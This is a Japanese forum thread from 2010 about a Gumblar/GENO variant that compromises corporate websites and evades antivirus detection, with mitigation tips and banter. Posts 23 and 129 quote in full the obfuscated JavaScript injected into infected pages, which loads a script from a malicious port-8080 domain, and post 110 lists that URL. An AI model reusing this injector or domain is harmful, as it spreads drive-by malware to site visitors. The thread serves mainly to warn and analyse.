avast!のWebシールドでも反応しない新ガンブラーが登場
1 : 集気ビン(東日本):
ハスクバーナ・ゼノア
tp://www.zenoah.co.jp/ ← 感染サイト閲覧注意
zenoah_co_jp.htm
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262880649
0/41 (0.00%)
※時間が経つとスクリプトが変わる可能性あり? 詳細は不明
/*LGPL*/のときは反応しない
/*GNU GPL*/のときは反応する
【Gumblar/GENO】Web改竄ウイルス総合スレ【8080】
http://pc11.2ch.net/test/read.cgi/sec/1261855221/523n-
|
|
|
2 : バカ:2010/01/08(金) 02:45:12.24 ID:pmNFc7dq
プォーン!プォーン!
3 : ウケ(アラバマ州):2010/01/08(金) 02:45:14.02 ID:7h8EVcut
↓ガンプラかと思った
4 : モンキーレンチ(dion軍):2010/01/08(金) 02:45:18.05 ID:ZW8OUUH4
avastなんて使ってるのは情弱だけっしょ
通はkingsoft一択
通はkingsoft一択
5 : インパクトレンチ(神奈川県):2010/01/08(金) 02:46:02.82 ID:/iVC9W4l
分かり易く説明してよクソムシ
6 : アルコールランプ(埼玉県):2010/01/08(金) 02:47:01.29 ID:gbTbD6lJ
眼鏡かえようかな
7 : カッティングマット(千葉県):2010/01/08(金) 02:47:40.69 ID:lT3JVh+g
最近のウィルスはFTPパス抜くとか陰湿で嫌になるわ
豪快にHDD吹き飛ばすほうがまだ許せる
豪快にHDD吹き飛ばすほうがまだ許せる
8 : モンキーレンチ(大阪府):2010/01/08(金) 02:47:54.39 ID:xe588IAe
LGPLとかリンクしねーだろーが、おめーは
9 : ラベル(東京都):2010/01/08(金) 02:48:38.10 ID:1/1kKlEq
オススメのガンプラない?
10 : 万年筆(千葉県):2010/01/08(金) 02:48:49.04 ID:MOJWMK3U
ノーガード戦法最強
11 : モンキーレンチ(アラバマ州):2010/01/08(金) 02:48:53.54 ID:XRQNuMsA
>>1
マジかavast捨ててくる
マジかavast捨ててくる
12 : 集気ビン(大阪府):2010/01/08(金) 02:49:08.70 ID:1i0lfstO
一体、何が始まるんです?
13 : サインペン(大阪府):2010/01/08(金) 02:53:06.74 ID:v2JdNGhp
でもお高いんでしょう?
14 : ダーマトグラフ(千葉県):2010/01/08(金) 02:53:29.60 ID:opsZHu3B
つーかまたダブルオーがHGで出るんだろ、セブンソードっての
買った奴涙目だろ
買った奴涙目だろ
15 : ルアー(dion軍):2010/01/08(金) 02:54:39.80 ID:p3uYW3kP
みんなで感染したら怖くない
16 : モンキーレンチ(大阪府):2010/01/08(金) 02:54:42.45 ID:xe588IAe
レンタル鯖会社はファイルのハッシュを取って更新されたらメールするサービスしてくれ
Gumblarの対策って結局PDFリーダーをFoxitにして
FlashとJavaをアンインスコすれば済む話なんだよな
それができないから困るんだけど
結論から言うとアドビは潰れろという話なんだが
FlashとJavaをアンインスコすれば済む話なんだよな
それができないから困るんだけど
結論から言うとアドビは潰れろという話なんだが
素00と0ライザー買ってブブドゥドゥ楽しんでたらソード3付きとセブンソードってどういう事だおい
19 : ばね(catv?):2010/01/08(金) 02:59:29.45 ID:SeYjFUTA
金融系のサイトは大丈夫なんだろうか
ネット専業銀行のサイトにこれを仕込まれたらかなり大きな被害が出そうで心配なんだが
ネット専業銀行のサイトにこれを仕込まれたらかなり大きな被害が出そうで心配なんだが
20 : モンキーレンチ(千葉県):2010/01/08(金) 03:02:11.10 ID:f5Y8ItW/
21 : 試験管立て(東京都):2010/01/08(金) 03:02:38.62 ID:o62dCBR8
アヴァランチでさえ1/100で出たというのにセブンソードときたら…
22 : モンキーレンチ(catv?):2010/01/08(金) 03:06:40.71 ID:RSbxm0mu
AVG最強か
23 : ◆SsSSsSsSSs :2010/01/08(金) 03:06:49.19 ID:SIukZWYS
<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement('s&c^$#r))i($p@&t^&'.repl
ace(/&|#|\$|\(|@|\!|\^|\)/ig, ''));C1nse3sk8o41s.setAttribute('defer', 'd$#)e!^f$)e&(@@#r((!'
.replace(/#|\$|\(|&|\)|\^|@|\!/ig, ''));C1nse3sk8o41s.setAttribute('type', 't^&e(!x)$(t$/#@)j()(a
&)!v#a)s()c@^r$$i^$p()^?t&!@'.replace(/\(|@|\)|#|&|\$|\^|\!/ig, ''));C1nse3sk8o41s.setAttribute('id', 'U#!4!$^v&$e@h^)$x^
@w&$s#(@b)#w^^(&7#)6$@@l!)^'.replace(/&|\!|#|\$|\(|\^|@|\)/ig, ''));C1nse3sk8o41s.setAttribute('s()#r#^((c^'.replace(/@|&|#|\$|\(|
\)|\!|\^/ig, ''), 'h^^&t!t(p^^@&@:@/@/&!o?r!!#@k@)!#&u^!t^)@-!#!@c(#(o^m^$-((!b#)@@r(!.^@$h)##@a^#t)t#$))r(&^i&c@)$k$)).^o!$!r#g&)
$.&(w(#i$k@@t&$i!^@!o&n!!)a@@r$y&@#(-^$)o$r@g$!^!.$&^(w@e!!b$!@n#(^e#t$$e)#^^n$^g@!l$#!&i)$&s&^@h@.!r@@@u(&^:($8$^^0#8$
!!$0@)^/!&!g?o@o!((g)l?$)e(.@@c(!@^o!#m(/&g@(^o#((o^!)&g#@l))(e(?!.!!c&$$&o))$m&@$/@i!&n^t(!e^l^@.@)($c#(@o$!m(/)&v#)
))n^#e$t^@.$#@c()(n)^(&/$o&n^#)(l(^i^^n$)e!d^^o!@w@$&n(@.$$!#n^@e((t^/!@(@'.replace(/&|\(|\)|\$|\^|\!|#|@/ig, ''));
if (document){document.body.appendChild(C1nse3sk8o41s);}} } catch(O28ie36gdspcwlg5bd0) {}</script>
24 : ◆SsSSsSsSSs :2010/01/08(金) 03:09:44.70 ID:SIukZWYS
おっと研究用に貼ったところ情弱メルカトル民共が書き込めなくなっちまったな
25 : 印章(栃木県):2010/01/08(金) 03:11:48.83 ID:Me1/2ogq
永井先生思い出す
26 : ダーマトグラフ(中部地方):2010/01/08(金) 03:14:58.56 ID:nSuYDmMh
webシールドって意味あるの?
27 : めがねレンチ(アラバマ州):2010/01/08(金) 03:15:34.68 ID:0Y1WwcEA
>>24
本気で言ってるのか
本気で言ってるのか
28 : モンキーレンチ(大阪府):2010/01/08(金) 03:15:59.56 ID:xe588IAe
29 : ロープ(神奈川県):2010/01/08(金) 03:20:45.05 ID:NVI2Stl7
30 : 梁(兵庫県):2010/01/08(金) 03:24:51.24 ID:o0fm9RMi
標準シールドしか入ってない
31 : ミリペン(埼玉県):2010/01/08(金) 03:25:31.41 ID:i/D3VkTk
ドクター中松
http://dr●nakamats●com/
http://dr●nakamats●com/
32 : モンキーレンチ(大阪府):2010/01/08(金) 03:27:57.57 ID:xe588IAe
>>31
こんなに感染してるウイルス最近ないよな、毎日どっかが感染して、ばらまいてる
こんなに感染してるウイルス最近ないよな、毎日どっかが感染して、ばらまいてる
33 : ハンドニブラ(東京都):2010/01/08(金) 03:28:26.02 ID:h+mLLiMK
zenoahってなんだよ、迂闊にググれないだろ。
34 : 墨壺(関東・甲信越):2010/01/08(金) 03:40:24.18 ID:8wz5B0EY
凄い勢いで広がってるな
35 : ロープ(神奈川県):2010/01/08(金) 03:40:50.06 ID:NVI2Stl7
>>19
ふつうはそういったサイトはインターネット側からFTPで更新できないようになってるんじゃ?
ふつうはそういったサイトはインターネット側からFTPで更新できないようになってるんじゃ?
36 : インパクトレンチ(神奈川県):2010/01/08(金) 03:41:33.94 ID:Wg0234YQ
カスペ買え貧乏人ども
一方ノートン先生は寝ていた
38 : モンキーレンチ(大阪府):2010/01/08(金) 03:45:22.07 ID:xe588IAe
avastだって一発目だったらダメじゃん、有料系だって検体が送られてパターン更新されるまでは無防備
39 : モンキーレンチ(宮城県):2010/01/08(金) 03:45:29.81 ID:zUAQHovW
>>16
基本的に、うぷしたファイルそのものが感染してんじゃないっけ?
基本的に、うぷしたファイルそのものが感染してんじゃないっけ?
40 : モンキーレンチ(大阪府):2010/01/08(金) 03:48:03.16 ID:xe588IAe
41 : 金槌(東京都):2010/01/08(金) 03:48:21.01 ID:p3DpoRt2
なんでコメント行で検出したりしなかったりするんだよ
すげえ安易に検出プログラム作ってないか?
お前もだ、マカフィー
すげえ安易に検出プログラム作ってないか?
お前もだ、マカフィー
42 : モンキーレンチ(ネブラスカ州):2010/01/08(金) 03:52:45.02 ID:LbWp2ydj
adobe readerのjava script切ってれば問題ないんだろ?
余裕のよっちゃんイカだぜ
余裕のよっちゃんイカだぜ
43 : カラムクロマトグラフィー(茨城県):2010/01/08(金) 04:01:55.51 ID:gBaYEmUE
GENOの新種の事だたのか
しぶといなぁ
しぶといなぁ
中華の調味料でこんな名前のやつあったな
45 : 集気ビン(catv?):2010/01/08(金) 04:04:01.86 ID:Ga4RG1pl
avast!でさっき、ycmwc.exeなるファイルがどうとかって言う警告が出たんだけど、
誰が詳しく知らない?
誰が詳しく知らない?
46 : モンキーレンチ(関西地方):2010/01/08(金) 04:04:15.42 ID:FvJxDdit
おいMGガブスレイまだか
47 : カラムクロマトグラフィー(茨城県):2010/01/08(金) 04:04:43.13 ID:gBaYEmUE
ナンプラーはタイ
48 : ミキサー(北海道):2010/01/08(金) 04:05:52.69 ID:R4R7H3On
やっぱりカスペルスキー最強ってことでいいの?
検体ないうちはどこでも無理なんじゃないの
50 : エリ(埼玉県):2010/01/08(金) 04:08:28.50 ID:BTeklg9B
>>45
http://www.prevx.com/filenames/1997607211983020257-X1/YCMWC.EXE.html
ファイルの動作
YCMWC.EXEは、次の動作を実行するためにアクセスされています:
別のプロセスの仮想メモリ(プロセスハイジャック)に書き込みます
実行プロセス
終了するプロセス
レジスタは、ダイナミックリンクライブラリファイル
このプロセスは、ディスク上の他のプロセスを作成します
YCMWC.EXEは、次の動作の対象とされています:
起動時に開くプログラムをロードするレジストリの自動起動として追加
プロセスとして実行される
コードは仮想メモリ空間に他のプログラムによって挿入されて
プロセスの終了
登録すると、ダイナミックリンクライブラリファイルとして
ディスク上のプロセスとして作成された
ファイル名YCMWC.EXE最初の2010年1月3日にPrevxコミュニティは、次の地理的な地域で見られた:
日本2010年1月3日に
イギリス2010年1月6日に
http://www.prevx.com/filenames/1997607211983020257-X1/YCMWC.EXE.html
ファイルの動作
YCMWC.EXEは、次の動作を実行するためにアクセスされています:
別のプロセスの仮想メモリ(プロセスハイジャック)に書き込みます
実行プロセス
終了するプロセス
レジスタは、ダイナミックリンクライブラリファイル
このプロセスは、ディスク上の他のプロセスを作成します
YCMWC.EXEは、次の動作の対象とされています:
起動時に開くプログラムをロードするレジストリの自動起動として追加
プロセスとして実行される
コードは仮想メモリ空間に他のプログラムによって挿入されて
プロセスの終了
登録すると、ダイナミックリンクライブラリファイルとして
ディスク上のプロセスとして作成された
ファイル名YCMWC.EXE最初の2010年1月3日にPrevxコミュニティは、次の地理的な地域で見られた:
日本2010年1月3日に
イギリス2010年1月6日に
51 : ノギス(東京都):2010/01/08(金) 04:08:29.90 ID:VA8/PiXa
tes
52 : 墨壺(関東・甲信越):2010/01/08(金) 04:09:31.45 ID:8wz5B0EY
>>42
最近の新型は駄目らしい
最近の新型は駄目らしい
53 : 吸引ビン(鳥取県):2010/01/08(金) 04:09:51.53 ID:I2821ZCV
>>52
まじでか
まじでか
>>53
うそ
うそ
55 : 吸引ビン(鳥取県):2010/01/08(金) 04:10:52.31 ID:I2821ZCV
壁殴っちまった・・・
さっきYFHでエロあさってたらCPU100%でしばらくフリーズしたけど死んだかな
57 :( ● ´ ー ` ● ) はスバラシイ:2010/01/08(金) 04:11:29.65 ID:W3+QisOV BE:8990944-PLT(12000)
そもそも何でWEBサイト書き換えられるんだ?
GENOとか怪しいサイトならわかるけど、ローソンとかまともな企業のサイトが乗っ取られるっておかしいじゃん。
58 : 墨壺(関東・甲信越):2010/01/08(金) 04:12:17.33 ID:8wz5B0EY
59 : 吸引ビン(鳥取県):2010/01/08(金) 04:13:25.57 ID:I2821ZCV
>>58
おおありがとう
おおありがとう
60 : 集気ビン(catv?):2010/01/08(金) 04:14:47.24 ID:Ga4RG1pl
avastたん早く解決してくれー!
>>57
今度はハウス食品 採用サイト改ざん、閲覧者1万2000人にGumblarウイルス感染の恐れ - ITmedia News
http://www.itmedia.co.jp/news/articles/1001/07/news082.html
>採用サイトを担当する制作会社のPCがGumblar亜種に感染、サイト管理用のIDとパスワードが盗まれ、サイトが改ざんされたという。
今度はハウス食品 採用サイト改ざん、閲覧者1万2000人にGumblarウイルス感染の恐れ - ITmedia News
http://www.itmedia.co.jp/news/articles/1001/07/news082.html
>採用サイトを担当する制作会社のPCがGumblar亜種に感染、サイト管理用のIDとパスワードが盗まれ、サイトが改ざんされたという。
63 : モンキーレンチ(大阪府):2010/01/08(金) 04:17:12.30 ID:xe588IAe
>>57
どっかのとこで感染したPCから自分のサイトをFTPで更新すると
パケットキャプチャが仕掛けられててFTPのパスワードが抜かれる
感染したPCの中身に関しては破壊行為を起こさないから感染に気がつきにくい
HP制作会社のPCが感染したりすると一気に数サイトがやられる
さらにまともな企業サイトを見ているからウイルス感染に気がつかない
どっかのとこで感染したPCから自分のサイトをFTPで更新すると
パケットキャプチャが仕掛けられててFTPのパスワードが抜かれる
感染したPCの中身に関しては破壊行為を起こさないから感染に気がつきにくい
HP制作会社のPCが感染したりすると一気に数サイトがやられる
さらにまともな企業サイトを見ているからウイルス感染に気がつかない
64 : 銛(長屋):2010/01/08(金) 04:17:26.71 ID:ujCEivd/
>>57
中国のおから工事と同じ理屈だろ
中国のおから工事と同じ理屈だろ
65 : モンキーレンチ(大阪府):2010/01/08(金) 04:17:58.73 ID:xe588IAe
>>60
malwareって書いてあるから感染してるよ
malwareって書いてあるから感染してるよ
66 : ペン(catv?):2010/01/08(金) 04:19:36.16 ID:40w9SLjY
ポリモルフィックか
万一に備えてNoScriptのホワイトリストを真っ白にしとくか
あとHGUCΖΖを早くしてね
あとHGUCΖΖを早くしてね
68 : 集気ビン(catv?):2010/01/08(金) 04:22:39.48 ID:Ga4RG1pl
>>62
Webサイト制作会社のセキュリティってザルなんだな。もっと気を付けて欲しいわ。
Webサイト制作会社のセキュリティってザルなんだな。もっと気を付けて欲しいわ。
70 : 豆腐(関西):2010/01/08(金) 04:23:48.15 ID:8QSFA7bN
今回ヒューリスティック検知も素通りなんかい?
71 : 昆布(岩手県):2010/01/08(金) 04:23:52.82 ID:BSA7BpCA
WIN2000最強すぎてワラタww
なんぼ踏んでもビクともしねええええwwww
XP(笑)
なんぼ踏んでもビクともしねええええwwww
XP(笑)
72 :( ● ´ ー ` ● ) はスバラシイ:2010/01/08(金) 04:24:58.79 ID:W3+QisOV BE:7867627-PLT(12000)
>62-64
サンクス。
単にPCにイタズラしたり銀行とかネトゲのID盗むんじゃなくて、
より影響力のあるサイトを乗っとろうとするって挙動はウィルスっぽくてかっこいいな。
73 : ラジオペンチ(東京都):2010/01/08(金) 04:25:15.16 ID:osM4l0cq
JavaScriptを切ってない男の人って……
これはbsdで運用してると問題ないの?
>>31
さっきウイルス発見したのにいまはもうない
さっきウイルス発見したのにいまはもうない
76 : ミリペン(埼玉県):2010/01/08(金) 04:49:32.65 ID:i/D3VkTk
>>75
「/*GNU GPL*/ 」が「/*LGPL*/」に変わった
「/*GNU GPL*/ 」が「/*LGPL*/」に変わった
77 : モンキーレンチ(大阪府):2010/01/08(金) 04:50:19.40 ID:xe588IAe
78 : 万年筆(中部地方):2010/01/08(金) 04:54:22.07 ID:KirAvtDd
>>76
中松が書き換えたの?
中松が書き換えたの?
>>78
ウイルスが書き換えたんでしょ
ウイルスが書き換えたんでしょ
82 : モンキーレンチ(大阪府):2010/01/08(金) 04:57:55.40 ID:xe588IAe
>>78
こんな時間に作業してくれるHP制作会社があったら素晴らしいけど
こんな時間に作業してくれるHP制作会社があったら素晴らしいけど
>>78
中松本人がやってるの想像したじゃねーか
中松本人がやってるの想像したじゃねーか
84 : 鉤(広島県):2010/01/08(金) 05:18:10.09 ID:9OmmVN4d
firefoxが落ちたな
しかも反応ないし、これはやばいな
しかも反応ないし、これはやばいな
今>>1のソースをvirustotalにおくったらNOD32だけが反応した
86 : モンキーレンチ(大阪府):2010/01/08(金) 05:34:36.99 ID:xe588IAe
>>85
URLください
URLください
88 : 金槌(東京都):2010/01/08(金) 05:39:30.31 ID:p3DpoRt2
89 : モンキーレンチ(大阪府):2010/01/08(金) 05:42:02.21 ID:xe588IAe
90 : モンキーレンチ(愛知県):2010/01/08(金) 05:45:33.67 ID:LN7x1vyk
ムリだ!ガンブラーは止まらない!
/*LGPL*/の中松はどこも反応しない
ttp://www.virustotal.com/jp/analisis/3cd786f2e75356a6d5343142226e6b7550aa635585db10185c26054c365fdc91-1262898334
ttp://www.virustotal.com/jp/analisis/3cd786f2e75356a6d5343142226e6b7550aa635585db10185c26054c365fdc91-1262898334
92 : カッターナイフ(catv?):2010/01/08(金) 06:22:09.55 ID:dowVdiTp
俺等日本のサイトでしか騒いでないけど、
アメリカのサイトだって当然感染してるところがあるだろうし
ヘタしたらAdobe、訴訟されまくりになるんじゃね?
アメリカのサイトだって当然感染してるところがあるだろうし
ヘタしたらAdobe、訴訟されまくりになるんじゃね?
>>91
それちょこちょこ改ざんされてるかも。今確かめたらvirustotalは新しいファイルとして認識したよ。
それちょこちょこ改ざんされてるかも。今確かめたらvirustotalは新しいファイルとして認識したよ。
怖いなあ。なんかますます進化してるなあ。
>>93
今もう一回保存してファイルのhashをみたけど前と同じだった
今もう一回保存してファイルのhashをみたけど前と同じだった
>>95
おれはhtmlだけおくったみたい。失礼しました。
おれはhtmlだけおくったみたい。失礼しました。
97 : モンキーレンチ(dion軍):2010/01/08(金) 08:28:12.36 ID:dgNvMWRD
゙!:|:::::|::l::|:l::l:;l斗:::'´!|:l:::li| l:::::`!十‐+|:_l:::li::::/,小、{_イ^| ト、ヽ,)
/ハ:::::!::l::l:{::!::l:::! ::::l:| |:::li| ゙!::::::ト!:::::l:li:::トl:l└vオ l |/| ゙Y
/ ハ::::!::!:l:|::!゙y,ァネ宀、` ヾヾヽ ,ァ7=!t、:l::|:l:i (勹 j j/}| |
/ / ヾミ:l::|ヾYオ゙h ::::::} 1i .::::ヽ!:|:li と,フ / !Y::| |
ヽ/ l`:::`:l|:i ビ_''ツ ト!、:;;;;::リト川(イリ/ /i::i:l:| |
あ、バスト? |:: ::j:!:kXxx . `ー--'/,';!::!j゙Y,/ /::|::i:|:| |
|:: :l:l:ilヽ、 、 xXxx//// }j"lヽ/ :::l::l:|:L_」
|:: :l:|:l:|:{:{> 、 ,. ////!::lj:: l:i l:i i::::|::l:|l
| :: :l:|:l:|:}{:{:l::l::l:l:` ┬ ' //;ノ」_!_lj::l|:l:l::l::l:::|::l:|l
j :: :l:|:l:l:{:/´ ̄`ヽ」 /彡'´ `Y:l:l::|: l:::|::::|l
,' ::;:'j':l:l:{/ 、 ノ,〃/ l:l:l::|:::|:::!::::l:l、
/ :;:'/j:l::l:j ` {{( !l l::|: |:::|::::l::li
/::;:'/:;j:j::jノ ,.. `)) ! i|:l:l::|:::|:::l::::|::l:i、
. /:;:'/:::ji/ /r‐‐<`ヽ、 l .ll:|:l::|::i|:::| ::|::l::l
l::;'/::/ ,/.r-‐'≠` ヽ.`}| i!:l:|:l:|::||:::|:::|::|::|
/´ヾ ./ i r-、 .| ! !l:|:l::l::|l::: | ::|::|::|
/´ゝ、_,} : し' } | .! ijリ !jl///リ !j }l/
{ ´ ̄ ̄`ヽ ', { |l | l〃/〃/ /〃/
ヘ、 二ニニイ , \ ' ´ V ! .|i// / /
}rー-‐‐ァ'、 ヽ、 ヘ ∨ |
/ハ:::::!::l::l:{::!::l:::! ::::l:| |:::li| ゙!::::::ト!:::::l:li:::トl:l└vオ l |/| ゙Y
/ ハ::::!::!:l:|::!゙y,ァネ宀、` ヾヾヽ ,ァ7=!t、:l::|:l:i (勹 j j/}| |
/ / ヾミ:l::|ヾYオ゙h ::::::} 1i .::::ヽ!:|:li と,フ / !Y::| |
ヽ/ l`:::`:l|:i ビ_''ツ ト!、:;;;;::リト川(イリ/ /i::i:l:| |
あ、バスト? |:: ::j:!:kXxx . `ー--'/,';!::!j゙Y,/ /::|::i:|:| |
|:: :l:l:ilヽ、 、 xXxx//// }j"lヽ/ :::l::l:|:L_」
|:: :l:|:l:|:{:{> 、 ,. ////!::lj:: l:i l:i i::::|::l:|l
| :: :l:|:l:|:}{:{:l::l::l:l:` ┬ ' //;ノ」_!_lj::l|:l:l::l::l:::|::l:|l
j :: :l:|:l:l:{:/´ ̄`ヽ」 /彡'´ `Y:l:l::|: l:::|::::|l
,' ::;:'j':l:l:{/ 、 ノ,〃/ l:l:l::|:::|:::!::::l:l、
/ :;:'/j:l::l:j ` {{( !l l::|: |:::|::::l::li
/::;:'/:;j:j::jノ ,.. `)) ! i|:l:l::|:::|:::l::::|::l:i、
. /:;:'/:::ji/ /r‐‐<`ヽ、 l .ll:|:l::|::i|:::| ::|::l::l
l::;'/::/ ,/.r-‐'≠` ヽ.`}| i!:l:|:l:|::||:::|:::|::|::|
/´ヾ ./ i r-、 .| ! !l:|:l::l::|l::: | ::|::|::|
/´ゝ、_,} : し' } | .! ijリ !jl///リ !j }l/
{ ´ ̄ ̄`ヽ ', { |l | l〃/〃/ /〃/
ヘ、 二ニニイ , \ ' ´ V ! .|i// / /
}rー-‐‐ァ'、 ヽ、 ヘ ∨ |
あ、ババババ
99 : 泡箱(神奈川県):2010/01/08(金) 08:52:06.02 ID:7yMN4HaH
最近のは、OSがVista/7だったりしたら動作を変えるようになってるな
UACにひっかかって不審におもわれたりしないように
UACにひっかかって不審におもわれたりしないように
100 : 蛸壺(大阪府):2010/01/08(金) 09:13:39.50 ID:U4Jpc+Sd
MSSEの俺は大丈夫
101 : マイクロシリンジ(大阪府):2010/01/08(金) 09:14:24.14 ID:p+dqAbpV
未だにXP使ってる人居るんだww
102 : モンキーレンチ(関西地方):2010/01/08(金) 09:15:23.60 ID:/uGUtDvW
この前SecurityToolっていうウィルスみたいなのに感染して
削除したらOS起動しなくなってえらい目に合ったわ・・・
削除したらOS起動しなくなってえらい目に合ったわ・・・
103 : 乳鉢(愛媛県):2010/01/08(金) 09:16:10.46 ID:95VXrh4o
どうせアドビをアップデートしとけば無傷なんだろ?
104 : レーザーポインター(千葉県):2010/01/08(金) 09:18:35.74 ID:f93a1mI9
105 : ボウル(アラバマ州):2010/01/08(金) 09:21:13.08 ID:zLrW2kLQ
素のFTPでインターネットからコンテンツ更新させるサイトなんて閉鎖しろ
106 : ガスレンジ(catv?):2010/01/08(金) 09:36:21.52 ID:A2+uIIR4
セキュ板の人いる?
今いちばんガンブラー絡みの情報集まってるスレってどこ?
今いちばんガンブラー絡みの情報集まってるスレってどこ?
108 : 駒込ピペット(福岡県):2010/01/08(金) 09:46:57.21 ID:03c/WkLp
ガンブラーと聞いて
XTOとか黄金砲とか連想してしまった
XTOとか黄金砲とか連想してしまった
109 : ドラフト(神奈川県):2010/01/08(金) 10:05:52.33 ID:EuuKBnOp
・Windows Vistaもしくは7を一般ユーザー(非管理者)でログインして使う
・Web閲覧には保護モードを有効にしたIE7orIE8を使う
・Microsoft UpdateでOSは最新に保つ
・Adobe Readerはインストールしないか、最新版をJavascript無効にして使う
・Adobe Flashは最新版を使う
・Javaはインストールしないか、最新版を使う
この6つを行えばかなり感染確立が下がる
・Web閲覧には保護モードを有効にしたIE7orIE8を使う
・Microsoft UpdateでOSは最新に保つ
・Adobe Readerはインストールしないか、最新版をJavascript無効にして使う
・Adobe Flashは最新版を使う
・Javaはインストールしないか、最新版を使う
この6つを行えばかなり感染確立が下がる
110 : ドリルドライバー(東日本):2010/01/08(金) 10:11:11.85 ID:weXO/2mG BE:556335252-PLT(12001)
://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.comgoogle.com/intel.com/vnet.cn/onlinedown.net/
111 : モンキーレンチ(東京都):2010/01/08(金) 10:19:07.15 ID:SEXoMUYs
オンラインスキャンでもするか
112 : 鉋(アラバマ州):2010/01/08(金) 10:30:13.19 ID:OIlIqCOV
youtubeにavast! proのkeygen上がっててワロタwww
>>105
それにも感染してた
ttp://www.virustotal.com/jp/analisis/9f09358064b50fc8c84d1b41f1890874e25eb85cd7d3ee20e33df83bbcc6583d-1262914771
それにも感染してた
ttp://www.virustotal.com/jp/analisis/9f09358064b50fc8c84d1b41f1890874e25eb85cd7d3ee20e33df83bbcc6583d-1262914771
114 : ガスレンジ(catv?):2010/01/08(金) 10:52:26.21 ID:A2+uIIR4
>>107
d
d
115 :ウイルス本体も外部にあってどんどん更新されるわけだろ:2010/01/08(金) 10:54:38.09 ID:HBE4CUAg
これさあ・・・SFTP(SSH+FTP)しか更新できなくしててもタメなんじゃね?
116 : 平天(広島県):2010/01/08(金) 10:57:29.11 ID:Q1EoUJYP
俺のavast!タンなら、俺が何もしないでも俺を救ってくれると信じてる
117 : マイクロピペット(神奈川県):2010/01/08(金) 11:16:52.42 ID:9KwqRsLi
PeerBlock で海外へのHTTP接続を拒否している俺に隙はなかった。
Web閲覧で、海外鯖の怪しいpdfやらflashをブラウザが見に行くから問題なので、
通信自体を遮断してしまえばいい。
日本のサイトに罠置かれたらやばいけど。
Web閲覧で、海外鯖の怪しいpdfやらflashをブラウザが見に行くから問題なので、
通信自体を遮断してしまえばいい。
日本のサイトに罠置かれたらやばいけど。
118 : 硯箱(アラバマ州):2010/01/08(金) 11:18:42.95 ID:xqVVIi84
プァープァープァー
んで、結局これはうぇbだけが書きかえれるの??
前のgenoみたくwin32\うんとかsqのハッシュやファイル容量
とか増えたり??
前のgenoみたくwin32\うんとかsqのハッシュやファイル容量
とか増えたり??
121 : マイクロピペット(神奈川県):2010/01/08(金) 11:28:26.40 ID:9KwqRsLi
>>118
そういうのはある程度巡回先が決まってるから、そこだけ許可するルールを追加する。
初回はめんどくさいが、一度作れば終わりだし、作業もクリックだけで出来るから特に不満はない。
それでも不便なら、最近は知らんが、GENOウィルスの怪しいpdfが置かれてるサーバは、バルト三国やらロシアやらの
普段閲覧するような国じゃないのでIPリスト拾ってそこだけでも弾けば良いんじゃね?
>>118がロシア人なら知らん。
そういうのはある程度巡回先が決まってるから、そこだけ許可するルールを追加する。
初回はめんどくさいが、一度作れば終わりだし、作業もクリックだけで出来るから特に不満はない。
それでも不便なら、最近は知らんが、GENOウィルスの怪しいpdfが置かれてるサーバは、バルト三国やらロシアやらの
普段閲覧するような国じゃないのでIPリスト拾ってそこだけでも弾けば良いんじゃね?
>>118がロシア人なら知らん。
122 : モンキーレンチ(三重県):2010/01/08(金) 11:31:18.64 ID:In7mpC/S
>>119
コーヒー吹いたわw
コーヒー吹いたわw
124 : ◆SsSSsSsSSs :2010/01/08(金) 12:04:07.25 ID:SIukZWYS
>>73
えっ
えっ
125 : 冷却管(広島県):2010/01/08(金) 12:05:07.23 ID:qrGub+6x
genoってどういうウイルスなの?
126 : 夫婦茶碗(catv?):2010/01/08(金) 12:06:39.34 ID:MUNUow0p
おっと、チェンs−好きで良く見てたサイトだ
127 : ガスレンジ(catv?):2010/01/08(金) 12:15:11.75 ID:A2+uIIR4
128 : モンキーレンチ(中部地方):2010/01/08(金) 12:16:37.29 ID:Atznycs9
vistaはセーフだよね?
129 : メスピペット(catv?):2010/01/08(金) 12:20:10.98 ID:KptIBMCc
<script>
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->
/*GNU GPL*/
try{window.onload = function(){var U26gcel3nnek = document.createElement('s@$$&c)$&r$i#(p#$!t!!('.replace(/@|\)|\!|\(|\^|\$|&|#/ig, ''));
var Zavq7z4z78k = 'Imrp1rhevfo';
U26gcel3nnek.setAttribute('type', 't(^$e&@&x!!$t!@&/)j((a)v&&a@(^s(!c((r!i$!p!$t!(#'.replace(/\^|#|&|\!|\(|\$|\)|@/ig, ''));
U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
